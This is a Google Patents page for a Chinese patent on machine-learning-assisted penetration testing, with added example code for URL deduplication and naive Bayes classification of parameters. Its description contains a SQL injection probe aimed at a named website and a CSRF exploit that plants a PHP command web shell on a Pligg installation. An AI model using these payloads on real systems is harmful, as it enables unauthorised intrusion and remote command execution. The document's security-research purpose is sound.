CN106874768B - Penetration test method and device - Google Patents


Info

Publication number: CN106874768B
Authority: CN (China)
Prior art keywords: data stream, vulnerability, data, poc, scanning
Legal status: Active
Application number: CN201611255209.8A
Other languages: Chinese (zh)
Other versions: CN106874768A
Inventors: 姚勇, 谭智勇, 薛兆云, 钟锋, 张勇
Current assignee: Beijing Brilliant Hi Tech Development Co Ltd
Original assignee: Beijing Brilliant Hi Tech Development Co Ltd
Events
    • Application filed by Beijing Brilliant Hi Tech Development Co Ltd
    • Priority to CN201611255209.8A
    • Publication of CN106874768A
    • Application granted
    • Publication of CN106874768B
    • Legal status: Active

Classifications

    • G PHYSICS
    • G06 COMPUTING; CALCULATING OR COUNTING
    • G06F ELECTRIC DIGITAL DATA PROCESSING
    • G06F 21/00 Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F 21/50 Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
    • G06F 21/57 Certifying or maintaining trusted computer platforms, e.g. secure boots or power-downs, version controls, system software checks, secure updates or assessing vulnerabilities
    • G06F 21/577 Assessing vulnerabilities and evaluating computer system security
    • G PHYSICS
    • G06 COMPUTING; CALCULATING OR COUNTING
    • G06N COMPUTING ARRANGEMENTS BASED ON SPECIFIC COMPUTATIONAL MODELS
    • G06N 20/00 Machine learning

Abstract

The embodiment of the invention provides a method and a device for penetration testing, which relate to the field of code auditing and comprise the following steps: acquiring a link data stream to be tested; performing vulnerability scanning on the data stream through a preset vulnerability library, in which a plurality of vulnerability verification codes (POCs) for verifying that the data stream has a vulnerability are stored, the POCs being obtained by performing machine learning on historical data streams; and outputting a first vulnerability scanning result. According to the scheme of the embodiment, the POCs in the vulnerability library are updated through machine learning, and the continuously updated library is used to scan the data stream to be tested, so as to meet the need to search for vulnerabilities of many different forms.

Description

Penetration test method and device
Technical Field
The embodiment of the invention relates to the field of code auditing, in particular to a penetration testing method and device.
Background
Code auditing, as its name implies, examines source code for defects and errors, analyses and locates the security vulnerabilities these problems cause, and provides code revision measures and recommendations; it is a process of in-depth problem discovery and elimination during the development and operation/maintenance phases of a system. Penetration testing is a key link in code auditing for finding and repairing vulnerabilities in the code.
The existing penetration testing process mainly relies on manual work: a tester observes the source-code data stream to be tested (hereinafter referred to as the "data stream") and searches for possible vulnerabilities in it according to the tester's professional level and experience. There are also automated vulnerability discovery methods that use vulnerability verification code (POC).
In the process of implementing the invention, the inventors found that the prior art has the following defects:
searching for vulnerabilities manually consumes a large amount of manpower and time, and testing efficiency is low; the existing POC-based method saves labour, but each POC can only find a single vulnerability, so the need to search for vulnerabilities of many different forms cannot be met.
Disclosure of Invention
The embodiment of the invention provides a penetration testing method and device, which update the POCs in a vulnerability library through machine learning and perform vulnerability scanning on the data stream to be tested using the continuously updated library, so as to meet the need to search for vulnerabilities of diverse forms.
In order to achieve the above object, an embodiment of the present invention provides a method for penetration testing, including: acquiring a link data stream to be tested; carrying out vulnerability scanning on the data stream through a preset vulnerability library; a plurality of vulnerability verification codes POC for verifying that the data stream has a vulnerability are stored in the vulnerability database, wherein the POC is obtained by performing machine learning on the historical data stream; and outputting a first vulnerability scanning result.
The embodiment of the invention provides a device for penetration test, which comprises: the data acquisition module is used for acquiring a link data stream to be tested; the first vulnerability scanning module is used for carrying out vulnerability scanning on the data stream through a preset vulnerability library; a plurality of vulnerability verification codes POC for verifying that the data stream has a vulnerability are stored in the vulnerability database, wherein the POC is obtained by performing machine learning on the historical data stream; and the vulnerability output module is used for outputting the first vulnerability scanning result.
According to the penetration testing method and device, a vulnerability library whose POCs are continuously and automatically updated is used, and the updated POCs are obtained by performing machine learning on the historical data stream, so that more diverse and complex vulnerabilities can be found when the data stream to be tested is scanned.
The foregoing description is only an overview of the technical solutions of the present invention, and the embodiments of the present invention are described below in order to make the technical means of the present invention more clearly understood and to make the above and other objects, features, and advantages of the present invention more clearly understandable.
Drawings
FIG. 1 is a first flowchart of a penetration testing method provided in an embodiment of the present invention;
FIG. 2 is a block diagram of a flow chart of a penetration test provided by an embodiment of the present invention;
FIG. 3 is a flow chart of a penetration testing method provided in an embodiment of the present invention;
FIG. 4 is a first schematic structural diagram of a penetration testing apparatus according to an embodiment of the present invention;
FIG. 5 is a schematic structural diagram of a penetration testing apparatus according to an embodiment of the present invention;
FIG. 6 is a schematic structural diagram of a data learning module according to an embodiment of the present invention;
FIG. 7 is a schematic structural diagram of a data acquisition module according to an embodiment of the present invention.
Detailed Description
Exemplary embodiments of the present disclosure will be described in more detail below with reference to the accompanying drawings. While exemplary embodiments of the present disclosure are shown in the drawings, it should be understood that the present disclosure may be embodied in various forms and should not be limited to the embodiments set forth herein. Rather, these embodiments are provided so that this disclosure will be thorough and complete, and will fully convey the scope of the disclosure to those skilled in the art.
Example one
Fig. 1 is a flowchart of a first method for penetration testing according to an embodiment of the present invention, where an execution subject of the method may be a terminal or a server having a penetration testing function. As shown in fig. 1, the method of penetration testing comprises the following steps:
S110, acquiring a link data stream to be tested;
A link is also called a hyperlink: a connection relationship pointing from a web page to a target. The object carrying the hyperlink in a web page may be a piece of text or a picture; when a user clicks the linked text or picture in a browser, the link target is displayed in the browser and opened or executed according to the type of the target. Hyperlinks on web pages are typically implemented using Uniform Resource Locators (URLs).
The link data stream (hereinafter referred to as "data stream") in this embodiment may be understood as a set of all data packets required to be transmitted in the process of completing a link, where, taking a web link as an example, the data stream corresponding to the link may be all data packets included in URL data for requesting the link.
Specifically, when URL data is used as the data stream to be tested, the URL data stream may be obtained as follows:
Step 1, enter a specified domain name or IP address in the address bar to link to the web page, and acquire the URL data of the target web page through crawler technology. For example, the IP address of the target web page is entered in the address bar of a web browser and the page is requested; during the linking process, the crawler captures the URL data of the target web pages reached by jumps from the current page's request, and these are recorded as the URL data of the target web page.
Step 2, perform fingerprint identification and comparison on the URL data to remove duplicate URL data. Specifically, after a large amount of URL data has been captured by the web crawler, it may contain duplicates, so the duplicate URL data is removed by fingerprinting and comparing all the acquired URL data, which reduces unnecessary workload.
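As an added example (not the patent's own code) of the fingerprint comparison in step 2: the fingerprint below covers a URL's scheme, host, path and the set of query parameter names, so crawled links that differ only in parameter values, parameter order, host case, a default port or a fragment collapse to one test target. The URLs are constructed sample crawler output under the example.test domain.

```python
"""Fingerprint-based de-duplication of crawled URL data.

Added example, not the patent's own code. It assumes the crawler has already
produced a list of URLs and that a URL's fingerprint should cover scheme, host,
path and the set of query parameter *names*, so that links differing only in
parameter values or parameter order are treated as one test target.
"""
import hashlib
from urllib.parse import parse_qsl, urlsplit


def fingerprint(url: str) -> str:
    """Return a stable fingerprint of a URL's structure.

    Normalisation before hashing:
      * scheme and host lower-cased (urlsplit does this), default ports dropped
      * an empty path becomes "/"
      * the fragment is discarded (it is never sent to the server)
      * query parameter names are sorted, values are ignored
    """
    parts = urlsplit(url.strip())
    host = parts.hostname or ""
    port = parts.port
    default = {"http": 80, "https": 443}.get(parts.scheme)
    if port is not None and port != default:
        host = f"{host}:{port}"
    path = parts.path or "/"
    names = sorted({k for k, _ in parse_qsl(parts.query, keep_blank_values=True)})
    canonical = f"{parts.scheme}://{host}{path}?{','.join(names)}"
    return hashlib.sha256(canonical.encode("utf-8")).hexdigest()


def dedupe_urls(urls):
    """Keep the first URL seen per fingerprint. Returns (kept_urls, dropped_count)."""
    seen = set()
    kept = []
    dropped = 0
    for url in urls:
        fp = fingerprint(url)
        if fp in seen:
            dropped += 1
            continue
        seen.add(fp)
        kept.append(url)
    return kept, dropped


# Constructed sample of crawler output (not real crawl data).
CRAWLED = [
    "http://www.example.test/news.asp?fenlei=5",
    "http://www.example.test/news.asp?fenlei=9",          # same structure, other value
    "HTTP://WWW.EXAMPLE.TEST:80/news.asp?fenlei=12#top",  # case, default port, fragment
    "http://www.example.test/news.asp?page=2&fenlei=5",   # extra parameter: new target
    "http://www.example.test/news.asp?fenlei=5&page=3",   # same names, other order
    "http://www.example.test/about.asp",
    "http://www.example.test/about.asp/",                 # trailing slash: distinct path
]

if __name__ == "__main__":
    kept, dropped = dedupe_urls(CRAWLED)
    print(f"kept {len(kept)} of {len(CRAWLED)} URLs, dropped {dropped} duplicates")
    for url in kept:
        print("  ", url)
```

Whether parameter values should be ignored is a policy choice: a scanner that fuzzes each parameter once per URL structure wants this fingerprint, while one that verifies specific recorded requests should hash the values as well.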
S120, vulnerability scanning is carried out on the data stream through a preset vulnerability library; the vulnerability database stores a plurality of vulnerability verification codes POC for verifying that the data stream has vulnerabilities, and the POCs are obtained by performing machine learning on the historical data stream.
In this embodiment, on the basis of the prior art in which vulnerability verification codes (POC) automatically perform vulnerability verification, a vulnerability library including multiple POCs is pre-established, and vulnerability scanning is performed on the data stream through this library. Specifically, when vulnerability scanning is executed, the data stream to be tested is verified one by one by each POC in the library; if the verification passes, it is determined that a vulnerability exists in the data stream. "POC verification passes" means that the POC code executes successfully once when verifying the data stream; if the POC code does not execute successfully, the result is marked as a POC verification failure.
Unlike the prior art, the POCs in the vulnerability library used to verify data streams in this embodiment are continuously updated, and the updated POCs are obtained by performing machine learning on historical data streams, i.e. the data streams corresponding to each past test. The method steps for generating POCs by machine learning on the historical data stream are described in detail in the embodiment corresponding to fig. 2.
S130, outputting a first vulnerability scanning result.
The first vulnerability scanning result refers to test result data formed after a test is performed on the data stream to be tested each time, and the test result data may include test time and a data stream part with a vulnerability, such as a request data packet, a parameter value, an address and other data stream parts with a vulnerability in the URL data.
For example, the following is URL data with a vulnerability:
http://www.ftcredit.com/news.asp?fenlei=5
Vulnerability scanning determines that fenlei=5 is the data stream part that triggers the vulnerability; this data stream part may be included in the first vulnerability scanning result, which may also include the whole URL in which the part is located.
In addition, the first vulnerability scanning result may further label the category to which each vulnerability belongs; the vulnerability categories may include:
1. Injection vulnerabilities, including Structured Query Language (SQL), operating system and Lightweight Directory Access Protocol (LDAP) injection, etc.
2. Broken authentication and session management.
3. Cross-site scripting (XSS).
4. Insecure direct object references.
5. Security misconfiguration.
6. Sensitive data exposure.
7. Missing function-level access control.
8. Cross-site request forgery (CSRF).
9. Use of components with known vulnerabilities.
10. Unvalidated redirects.
The vulnerabilities can also be graded according to their different impact ranges and impact degrees.
According to the penetration testing method, the preset vulnerability library is used to scan the data stream to be tested in order to determine the vulnerabilities present in it; the POCs in the library can be continuously updated, and the updated POCs are obtained by performing machine learning on the historical data stream, so that more diverse and complex vulnerabilities can be found when the data stream to be tested is scanned.
Example two
In the penetration testing method shown in fig. 1, the constantly updated POC vulnerability database plays a key role in the whole testing process, which provides a premise for finding out more diversified and complex vulnerabilities.
Fig. 2 shows a flow framework diagram of updating the POCs in the vulnerability library during the penetration test. As shown in fig. 2, the whole penetration test is roughly divided into three parts: acquiring a data stream, performing vulnerability scanning on the data stream, and learning from the data stream to form POCs.
Specifically, the IP address/domain name can be typed in the address input field, original URL data are obtained through a crawler technology, fingerprint identification is carried out on the original URL data to remove repeated URL data, and finally the rest URL data are used as a data stream to be tested; automatically scanning the data stream to be tested for vulnerabilities by using a vulnerability library to generate a vulnerability scanning result, wherein the result can contain a data part with vulnerabilities; and based on the vulnerability scanning result, the original data stream is subjected to vulnerability rule learning to form a new POC, and the new POC is added into the vulnerability database, so that the vulnerability searching capability of the vulnerability database is enhanced. Of course, for the bugs found after the bug scan, bug fixing may also be performed on the bugs.
Based on the flow framework for updating the POCs in the vulnerability library during the penetration test shown in fig. 2, the embodiment shown in fig. 3 gives a specific method for updating the POCs in the library, which includes the following steps:
S310, extracting from the original data stream a first data stream, i.e. everything except the data stream part with the vulnerability, and performing machine learning to generate a second data stream with a potential vulnerability;
specifically, after vulnerability scanning is performed on the data stream to be tested each time and the data stream part with the vulnerability is determined, the remaining data stream part except the data stream part with the vulnerability in the original data stream is marked as a first data stream. The first data stream is then extracted from the original data stream for machine learning to generate a second data stream with potential vulnerabilities.
In actual testing, for the data stream parts determined to have a vulnerability, a POC for finding the corresponding vulnerability naturally already exists in the vulnerability library. For the data stream parts in which no vulnerability was detected, there may be two reasons: no vulnerability exists in that data stream; or a vulnerability does exist, but it cannot be found with the POCs currently in the library (i.e. the library has no POC for that vulnerability). Therefore, in order to extend the range of vulnerabilities the library can discover, machine learning must be performed on the potentially undiscovered vulnerability data in the original data stream so as to expose these vulnerable data stream parts.
Specifically, machine learning may be performed on the first data stream to generate derived data streams, similar to the first data stream and of the same category, as the second data streams; the vulnerabilities of these derived data streams may be more obvious and more easily found with the current vulnerability library. When a vulnerability is detected in the second data streams, whether the vulnerability also exists in the first data stream can then be determined in a targeted manner by other verification methods.
As mentioned above, a link data stream such as URL data generally contains content data such as the request packet, parameter values and address; this embodiment defines such content data as the parameter content of the data stream. Further, the parameter content in the first data stream is defined as the first parameter content.
For example, the following URL data is taken as the first data stream:
http://www.ftcredit.com/news.asp?fenlei=9
Machine learning is performed on the first data stream to generate second data streams with a similar data structure, in which vulnerabilities may be obvious and can be found by the current vulnerability library.
Specifically, the second data stream may be generated as follows:
Step 1, perform category learning on the first parameter content in the first data stream through a naive Bayes algorithm to generate a plurality of second parameter contents of the same category as the first parameter content. For example, for the URL data fenlei=9 (corresponding to the first parameter content), category learning through a naive Bayes algorithm generates a plurality of second parameter contents of the same category as the first parameter content, such as:
fenlei=1
fenlei=2
……
Step 2, replace the first parameter content in the original first data stream with the corresponding second parameter content to form a second data stream.
For example, in the URL data, fenlei=9 is replaced with the newly generated second parameter contents fenlei=1, fenlei=2, ……, thereby forming a plurality of second data streams of the form:
http://www.ftcredit.com/news.asp?fenlei=1
http://www.ftcredit.com/news.asp?fenlei=2
……
of course, when actually generating the second parameter content, the generated parameter content may be more diversified as needed.
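The category learning and replacement steps above, as an added example that is not code from the patent: a small naive Bayes classifier over character-class features learns the category of the first parameter content, and same-category values are substituted into the URL to form the second data streams. The category set, training values, value generators and the example.test URL are constructed assumptions; the patent specifies only the naive Bayes algorithm.

```python
"""Category learning of parameter values and derivation of second data streams.

Added example, not the patent's own code. The categories ("integer", "slug",
"date"), the training values and the per-category value generators are
constructed assumptions; the patent only names the naive Bayes algorithm.
"""
import math
from collections import Counter, defaultdict
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit


def tokens(value: str):
    """Turn a parameter value into character-class features.

    Each character maps to 'd' (digit), 'a' (letter), 's' (separator) or 'o'
    (other); class bigrams capture ordering (digit-separator-digit in dates)
    and a length bucket separates "9" from "2017". Using classes instead of
    raw characters lets unseen values share features with the training set.
    """
    classes = []
    for ch in value:
        if ch.isdigit():
            classes.append("d")
        elif ch.isalpha():
            classes.append("a")
        elif ch in "-_./:":
            classes.append("s")
        else:
            classes.append("o")
    bigrams = [p + q for p, q in zip(classes, classes[1:])]
    return classes + bigrams + [f"len{min(len(value), 8)}"]


class NaiveBayes:
    """Multinomial naive Bayes with Laplace smoothing over tokens()."""

    def __init__(self):
        self.cat_counts = Counter()
        self.tok_counts = defaultdict(Counter)
        self.vocab = set()

    def fit(self, samples):
        for value, cat in samples:
            self.cat_counts[cat] += 1
            for t in tokens(value):
                self.tok_counts[cat][t] += 1
                self.vocab.add(t)

    def predict(self, value: str) -> str:
        total = sum(self.cat_counts.values())
        best, best_lp = None, -math.inf
        for cat, n in self.cat_counts.items():
            lp = math.log(n / total)  # log prior
            denom = sum(self.tok_counts[cat].values()) + len(self.vocab)
            for t in tokens(value):
                lp += math.log((self.tok_counts[cat][t] + 1) / denom)
            if lp > best_lp:
                best, best_lp = cat, lp
        return best


# Constructed labelled parameter values standing in for the historical data stream.
TRAINING = [
    ("5", "integer"), ("9", "integer"), ("42", "integer"), ("2017", "integer"),
    ("300", "integer"), ("news", "slug"), ("about-us", "slug"), ("index", "slug"),
    ("contact", "slug"), ("faq", "slug"), ("2016-12-30", "date"),
    ("2017-01-05", "date"), ("2015-06-01", "date"), ("2016-03-15", "date"),
]

# Constructed same-category value generators (the second parameter contents).
GENERATORS = {
    "integer": lambda: [str(i) for i in range(1, 6)],
    "slug": lambda: ["news", "index", "about", "contact", "search"],
    "date": lambda: ["2016-01-01", "2016-06-15", "2016-12-31"],
}


def build_model() -> NaiveBayes:
    model = NaiveBayes()
    model.fit(TRAINING)
    return model


def derive_second_streams(url: str, param: str, model: NaiveBayes):
    """Replace `param` in `url` with same-category values; return (category, urls)."""
    parts = urlsplit(url)
    query = parse_qsl(parts.query, keep_blank_values=True)
    first = dict(query).get(param)
    if first is None:
        raise KeyError(f"parameter {param!r} not present in {url}")
    category = model.predict(first)
    streams = []
    for second in GENERATORS[category]():
        if second == first:
            continue  # identical to the first data stream, nothing new to test
        new_query = [(k, second if k == param else v) for k, v in query]
        streams.append(urlunsplit(parts._replace(query=urlencode(new_query))))
    return category, streams


if __name__ == "__main__":
    model = build_model()
    cat, streams = derive_second_streams(
        "http://www.example.test/news.asp?fenlei=9", "fenlei", model)
    print(f"fenlei=9 classified as {cat}; derived second data streams:")
    for s in streams:
        print("  ", s)
```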
S320, scanning the vulnerability of the second data stream through the vulnerability library to determine a part of the second data stream with the vulnerability;
the formed second data streams are subjected to vulnerability scanning through a vulnerability library one by one, and the vulnerability of the second data streams generated after the first data streams are derived can be more obvious, so that the existing vulnerability can be easily detected through the existing POC. When a vulnerability is detected in a plurality of second data streams generated after a certain first data stream is derived, it is indicated that the original first data stream is likely to have the vulnerability, and at this time, vulnerability verification in other manners, such as manual experience judgment and the like, can be performed on the first data stream. When it is finally determined that the first data stream does have a vulnerability, it is further proved that the POC function in the current vulnerability library is not complete enough, and a POC update needs to be performed on the vulnerability library, for example, a function update is performed on the current existing POC, or a new POC is produced and added to the vulnerability library.
For example, the second data stream in the above example is scanned for vulnerabilities:
http://www.ftcredit.com/news.asp?fenlei=[0-9]+and(select count(*) from sysobjects)>=0
Here "[0-9]" represents any value from 0 to 9, and the code after "and" queries whether the sysobjects table exists in the data source: if it does, the condition returns true (indicating that the vulnerability scanning verification passes and a vulnerability exists in the second data stream); if it does not, the condition returns false (indicating that the verification fails and no vulnerability exists in the second data stream).
And S330, generating corresponding POC according to the part of the second data stream with the vulnerability, and adding the POC into the vulnerability database.
A generic version of POC generated from Cross-Site Request Forgery (CSRF) vulnerabilities is shown as follows:
-Create File by CSRF Exploit-
<html>
<body onload="document.form.submit();">
<form action="http://[target]/pligg/admin/admin_editor.php" method="post" name="form">
<input type="hidden" name="updatedfile" value="<?php system($_REQUEST['cmd']);?>">
<input type="hidden" name="the_file2" value="/var/www/html/pligg/backd00r.php">
<input type="hidden" name="isempty" value="1">
<input type="hidden" name="save" value="Save+Changes">
</form>
</body>
</html>
In this POC the parameter contents are the values of the "hidden", "action", "name" and "value" attributes, which can be varied by modifying the storage path given in the parameter.
Since the derived second data streams usually cover all the situations of that type of vulnerability, the corresponding POC can be generated according to the tested parts of the second data streams that have the vulnerability and added to the vulnerability library, so that the library's capability to search for diverse vulnerabilities is enhanced.
As a necessary premise for executing the steps of the method in the first embodiment of the present invention, the method for updating POC in a vulnerability database according to the embodiment of the present invention performs machine learning on a first data stream in an original data stream to generate a second data stream, then performs vulnerability scanning on the second data stream to find vulnerabilities of the second data stream, writes POC according to the vulnerabilities, and adds the POC to the vulnerability database, thereby enhancing the capability of the vulnerability database to find diversified vulnerabilities.
Example three
Fig. 4 is a schematic diagram of a first apparatus for penetration testing according to an embodiment of the present invention, which may be used to perform the method steps shown in fig. 1. As shown in fig. 4, the apparatus for the penetration test includes: data acquisition module 410, first vulnerability scanning module 420 and vulnerability output module 430, wherein:
a data acquisition module 410, configured to acquire a link data stream to be tested; the first vulnerability scanning module 420 is configured to perform vulnerability scanning on the data stream through a preset vulnerability database; the vulnerability database stores a plurality of vulnerability verification codes POC for verifying that the data stream has vulnerabilities, and the POC is obtained by machine learning of the historical data stream; the vulnerability output module 430 is configured to output a first vulnerability scanning result.
According to the penetration testing device, the preset vulnerability library is used to scan the data stream to be tested in order to determine the vulnerabilities present in it; the POCs in the library can be continuously updated, and the updated POCs are obtained by performing machine learning on the historical data stream, so that more diverse and complex vulnerabilities can be found when the data stream to be tested is scanned.
Example four
Fig. 5 shows another specific structure of the penetration testing apparatus provided in this embodiment. It includes all the modules of the apparatus shown in fig. 4 and, on that basis, adds functional modules for updating the POCs in the vulnerability library: data learning module 440, second vulnerability scanning module 450 and POC generating module 460, which can perform the method steps shown in fig. 3. As shown in fig. 5, based on the structure shown in fig. 4:
the first vulnerability scanning module 420 is specifically configured to verify the data stream one by one through each POC in the vulnerability database, and if the data stream passes the verification, determine that a vulnerability exists in the data stream.
Further, the vulnerability scanning result includes: the portion of the data stream where the vulnerability exists.
On this basis, the data learning module 440 may be configured to extract, from the original data stream, a first data stream except for the data stream portion with the bug, perform machine learning, and generate a second data stream with a potential bug; the second vulnerability scanning module 450 may be configured to perform vulnerability scanning on the second data stream through the vulnerability database to determine a portion of the second data stream in which a vulnerability exists; the POC generating module 460 is configured to generate a corresponding POC according to the part of the second data stream with the vulnerability, and add the POC to the vulnerability database.
Further, as shown in fig. 6, the data learning module 440 may specifically include:
the category learning unit 441 is configured to perform category learning on first parameter content in the first data stream through a naive bayes algorithm, and generate a plurality of second parameter content of the same category as the first parameter content; the data forming unit 442 is configured to replace the first parameter content in the original first data stream with the corresponding second parameter content to form a second data stream.
Further, the data stream may be URL data;
correspondingly, as shown in fig. 7, the data acquisition module 410 may specifically include:
a data obtaining unit 411, configured to input a specified domain name or IP address in an address bar to link to the web page and obtain the URL data of the target web page through crawler technology; and a data deduplication unit 412, configured to perform fingerprinting comparison on the URL data to remove duplicate URL data.
In the penetration testing device provided by the embodiment of the invention, functional modules for updating the POCs in the vulnerability library are added: the second data stream is generated by performing machine learning on the first data stream in the original data stream, vulnerability scanning is then performed on the second data stream to find its vulnerabilities, POCs are written according to those vulnerabilities, and the POCs are added to the vulnerability library, so that the library's capability to search for diverse vulnerabilities is enhanced.
Through the above description of the embodiments, those skilled in the art will clearly understand that each embodiment can be implemented by software plus a necessary general hardware platform, and certainly can also be implemented by hardware. With this understanding in mind, the above-described technical solutions may be embodied in the form of a software product, which can be stored in a computer-readable storage medium such as ROM/RAM, magnetic disk, optical disk, etc., and includes instructions for causing a computer device (which may be a personal computer, a server, or a network device, etc.) to execute the methods described in the embodiments or some parts of the embodiments.
Finally, it should be noted that: the above embodiments are only used to illustrate the technical solution of the present invention, and not to limit the same; while the invention has been described in detail and with reference to the foregoing embodiments, it will be understood by those skilled in the art that: the technical solutions described in the foregoing embodiments may still be modified, or some or all of the technical features may be equivalently replaced; and the modifications or the substitutions do not make the essence of the corresponding technical solutions depart from the scope of the technical solutions of the embodiments of the present invention.

Claims (6)

1. A method of penetration testing, comprising:
acquiring a link data stream to be tested;
carrying out vulnerability scanning on the data stream through a preset vulnerability library; a plurality of vulnerability verification codes POC for verifying that the data stream has a vulnerability are stored in the vulnerability database, wherein the POC is obtained by performing machine learning on the historical data stream;
outputting a first vulnerability scanning result,
wherein performing vulnerability scanning on the data stream through a preset vulnerability library comprises:
verifying the data stream by each POC in the vulnerability database one by one, if the verification is passed, determining that the vulnerability exists in the data stream,
the vulnerability scanning result comprises: a data stream portion in which a vulnerability exists;
the method further comprises the following steps:
extracting a first data stream except the data stream part with the vulnerability from the original data stream, and performing machine learning to generate a second data stream with a potential vulnerability;
performing vulnerability scanning on the second data stream through the vulnerability library to determine a part of the second data stream with the vulnerability, and determining whether the vulnerability exists in the first data stream when the second data stream is detected to have the vulnerability;
and generating corresponding POC according to the part of the second data stream with the vulnerability, and adding the POC into the vulnerability database.
2. The method of claim 1, wherein extracting, in the original data stream, a first data stream except for the data stream portion with the vulnerability, and performing machine learning to generate a second data stream with a potential vulnerability comprises:
performing category learning on first parameter content in the first data stream through a naive Bayes algorithm to generate a plurality of second parameter content of the same category as the first parameter content;
and replacing the first parameter content in the original first data stream with the corresponding second parameter content to form the second data stream.
3. The method according to claim 1 or 2, wherein the data stream is uniform resource locator (URL) data, and
acquiring the link data stream to be tested comprises the following steps:
entering a specified domain name/IP in an address bar to link to a webpage, and acquiring URL data of the target webpage through a crawler technology;
and performing fingerprint identification comparison on the URL data to remove duplicate URL data.
4. An apparatus for penetration testing, comprising:
a data acquisition module, configured to acquire a link data stream to be tested;
a first vulnerability scanning module, configured to perform vulnerability scanning on the data stream through a preset vulnerability library, wherein the vulnerability library stores a plurality of vulnerability verification codes (POC) for verifying that the data stream has a vulnerability, and the POC are obtained by performing machine learning on historical data streams;
and a vulnerability output module, configured to output a first vulnerability scanning result,
wherein the first vulnerability scanning module is specifically configured to verify the data stream one by one with each POC in the vulnerability library, and if the verification passes, determine that a vulnerability exists in the data stream,
the vulnerability scanning result comprises: a data stream portion in which a vulnerability exists;
the apparatus further comprises:
a data learning module, configured to extract, from the original data stream, a first data stream other than the data stream portion with the vulnerability, and perform machine learning to generate a second data stream with a potential vulnerability;
a second vulnerability scanning module, configured to perform vulnerability scanning on the second data stream through the vulnerability library to determine a portion of the second data stream with the vulnerability, and, when the second data stream is detected to have the vulnerability, determine whether the vulnerability is present in the first data stream;
and a POC generating module, configured to generate a corresponding POC according to the portion of the second data stream with the vulnerability and add the POC to the vulnerability library.
5. The apparatus of claim 4, wherein the data learning module specifically comprises:
a category learning unit, configured to perform category learning on first parameter content in the first data stream through a naive Bayes algorithm to generate a plurality of second parameter contents of the same category as the first parameter content;
and a data forming unit, configured to replace the first parameter content in the original first data stream with the corresponding second parameter content to form the second data stream.
6. The apparatus according to claim 4, wherein the data stream is URL data, and the data acquisition module specifically comprises:
a data acquisition unit, configured to enter a specified domain name/IP in an address bar to link to a webpage and acquire URL data of the target webpage through a crawler technology;
and a data deduplication unit, configured to perform fingerprint identification comparison on the URL data to remove duplicate URL data.
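The following is an added illustration of claims 2, 3, 5 and 6 (example code written for this page, not the patent holder's implementation): URL deduplication by a structural fingerprint, naive Bayes category learning over parameter values, and same-category substitution to form the "second data stream" that is then rescanned. The character-class feature set, the labelled training values, the replacement pool and the example.test URLs are all constructed assumptions; the patent does not specify any of them.

```python
import hashlib
import math
from collections import Counter, defaultdict
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

def dedup(urls):
    """Claim 3's duplicate removal: keep one URL per fingerprint of host, path and sorted parameter names."""
    seen = {}
    for u in urls:
        p = urlsplit(u)
        names = ",".join(sorted(k for k, _ in parse_qsl(p.query, keep_blank_values=True)))
        seen.setdefault(hashlib.sha256(f"{p.netloc}{p.path}?{names}".encode()).hexdigest(), u)
    return list(seen.values())

def features(value):
    """Binary character-class features used as naive Bayes evidence (assumed feature set)."""
    return {"digit": any(c.isdigit() for c in value), "alpha": any(c.isalpha() for c in value),
            "punct": any(not c.isalnum() for c in value), "long": len(value) > 8}

class NaiveBayes:
    """Bernoulli naive Bayes over the features above, with Laplace smoothing."""
    def __init__(self, labelled):
        self.prior = Counter(label for _, label in labelled)
        self.counts = defaultdict(Counter)
        for value, label in labelled:
            for f, on in features(value).items():
                self.counts[label][f] += on

    def classify(self, value):
        n, best = sum(self.prior.values()), (-math.inf, None)
        for label, c in self.prior.items():
            lp = math.log(c / n)
            for f, on in features(value).items():
                p = (self.counts[label][f] + 1) / (c + 2)
                lp += math.log(p if on else 1 - p)
            best = max(best, (lp, label))
        return best[1]

# Constructed historical parameter values with hand-assigned categories (training data).
TRAIN = [("42", "id"), ("1007", "id"), ("7", "id"), ("alice", "name"), ("bob_smith", "name"),
         ("2016-12-30", "date"), ("2017-01-02", "date")]
# Constructed same-category replacement values (the "second parameter content").
POOL = {"id": ["0", "-1", "99999999"], "name": ["zz", "A" * 64], "date": ["1970-01-01", "9999-12-31"]}

def second_stream(url, model):
    """Claim 2's substitution: replace each parameter value with every pooled value of its learned category."""
    p = urlsplit(url)
    params = parse_qsl(p.query, keep_blank_values=True)
    return [urlunsplit((p.scheme, p.netloc, p.path, urlencode(params[:i] + [(k, r)] + params[i + 1:]), ""))
            for i, (k, v) in enumerate(params) for r in POOL[model.classify(v)]]
```

Each URL returned by `second_stream` is what the second vulnerability scanning module would run against the POC library; a hit there is also checked against the original first data stream, as claim 1 describes.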
CN201611255209.8A 2016-12-30 2016-12-30 Penetration test method and device Active CN106874768B (en)


Publications (2)

Publication Number Publication Date
CN106874768A CN106874768A (en) 2017-06-20
CN106874768B true CN106874768B (en) 2020-03-24

Family

ID=59165260


Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination
GR01 Patent grant